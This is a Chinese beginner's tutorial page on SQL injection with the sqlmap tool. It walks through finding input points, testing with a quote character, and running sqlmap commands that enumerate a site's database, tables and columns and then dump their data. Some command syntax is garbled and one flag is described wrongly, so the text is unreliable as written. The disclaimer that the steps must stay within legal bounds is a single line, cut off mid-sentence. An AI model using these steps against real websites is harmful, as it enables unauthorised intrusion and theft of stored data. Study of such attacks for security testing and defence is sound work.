当前位置: 首页 > news >正文

初学:运用工具进行SQL注入

基础

常见数据库语言:

database -- db --数据库

table -- T -- 数据表

column -- C -- 数据列

初学:使用工具进行SQL注入

工具:sqlmap.py

步骤

1.找交互点

2.验证注入点

3.挖数据库名称

4.挖数据表名称

5.挖数据列名称

6.挖取目标数据

1.找交互点

在网站中寻找能与数据库进行交互的功能点 -- 找到能把请求传到数据库的地方

常见交互点:

1.具有GET请求的URL 如网址中 ,?关键词=值

2.登录框

3.搜索框

2.验证注入点

验证能否进行SQL注入

采用最简单的恶意语句尝试传输 在最后加上‘

查看页面跳转--数据库会报错--无法正常查询数据--页面会异常显示 报错 空白

3.挖数据库名称

python sqlmap.py -u “网址” --current -db

-u ---指定具有注入点的URL

-- current -db ---挖出当前网站的数据库名称

4.挖数据表名称

python sqlmap.py -u “网址” -D 刚刚挖出的数据库名称 -- tables

-D ---要攻击的数据库名称

--tables --- 挖出数据库中所有的数据表名称

image-20251107103911480

5.挖数据列名称

python sqlmap.py -u “网址” -D 刚刚挖出的数据库名称 - T 要攻击的数据库名称 --columns

-T --- 要攻击的数据库名称

--columns --- 挖出当前数据表下的所有列的名称

image-20251107104316208

6.挖数据

python sqlmap.py -u “网址” -D 刚刚挖出的数据库名称 - T 要攻击的数据库名称 -C 要攻击的列表名

--dump

-C --要攻击的列名 如果多列,可以用英语逗号隔开

--dump ---读取当下的数据

最后即可得到数据

注意:以上操作要在合法范围内,不得随意攻击,篡改他人网站,以

http://www.jsqmd.com/news/34050/

相关文章:

  • 2025年中频熔炼炉厂家推荐:浙江湘达机电,铜中频熔炼炉/铝中频熔炼炉/金中频熔炼炉/银中频熔炼炉/覆盖多金属加工场景
  • 2025 年 11 月尼龙板厂家推荐排行榜,防静电尼龙板,透明尼龙板,白色尼龙板,优质尼龙板公司推荐
  • 爱思益联系方式: 理性评估服务与费用
  • 2025年升降压充电管理IC权威推荐榜单:镍氢电池充电管理IC/铅酸电池充电管理IC/升压充电芯片源头厂家精选
  • docker 修改默认IP段
  • 2025年靠谱的静态扭矩传感器高评价厂家推荐榜
  • 2025年比较好的不锈钢阀厂家推荐及选择指南
  • 2025年11月中国抗衰老设备技术排行榜TOP10:科技抗衰新趋势解析
  • 2025年靠谱的薄壁不锈钢管厂家最新推荐权威榜
  • 爱思益联系方式: 如何验证信息真伪
  • 2025年抗衰老品牌哪家靠谱?Top5分析
  • 爱思益 联系方式: 验证师资与口碑后再付费
  • Newstar web week4
  • 2025 年长沙打印机出租平台口碑推荐榜单重磅揭晓,最新推荐高性价比租赁之选含全包 / 低价 / 长短期 / 包维修服务公司推荐
  • 2025年诚信的净化材料净化板厂家推荐及采购参考
  • ubuntu系统字体太小调整方法,亲测有效,2分钟解决!
  • 2025 年自动感应门 / 旋转门 / 平移门厂家选购指南,多玛自动门(上海)有限公司专业门控解决方案解析
  • MySQL8总被扫出漏洞,不想升级该怎么办呢?看我如何应对的
  • 2025年上轨隐藏式全景门生产厂家权威推荐榜单:无下轨全景门/折叠全景门/联动移门全景门源头厂家精选
  • 损失函数之焦点损失函数
  • 2025年石棉橡胶板厂家联系电话推荐:工业密封材料采购指南
  • 2025年优质的酒店工程墙布厂家最新用户好评榜
  • 2025年热门的双锥干燥机TOP实力厂家推荐榜
  • 2025年广东叛逆机构权威推荐榜单:素质教育/早恋教育/厌学源头机构精选
  • 5种主流的API架构风格
  • 2025 年 10 月卡板托盘,发货托盘厂家最新推荐,实力品牌深度解析采购无忧之选!
  • 2025年比较好的武汉钢模板品牌厂家排行榜
  • 2025年热门的防火门TOP实力厂家推荐榜
  • 2025年专业的工业制氮机设备品牌厂家排行榜
  • 2025年知名的柱塞泵厂家推荐及选择指南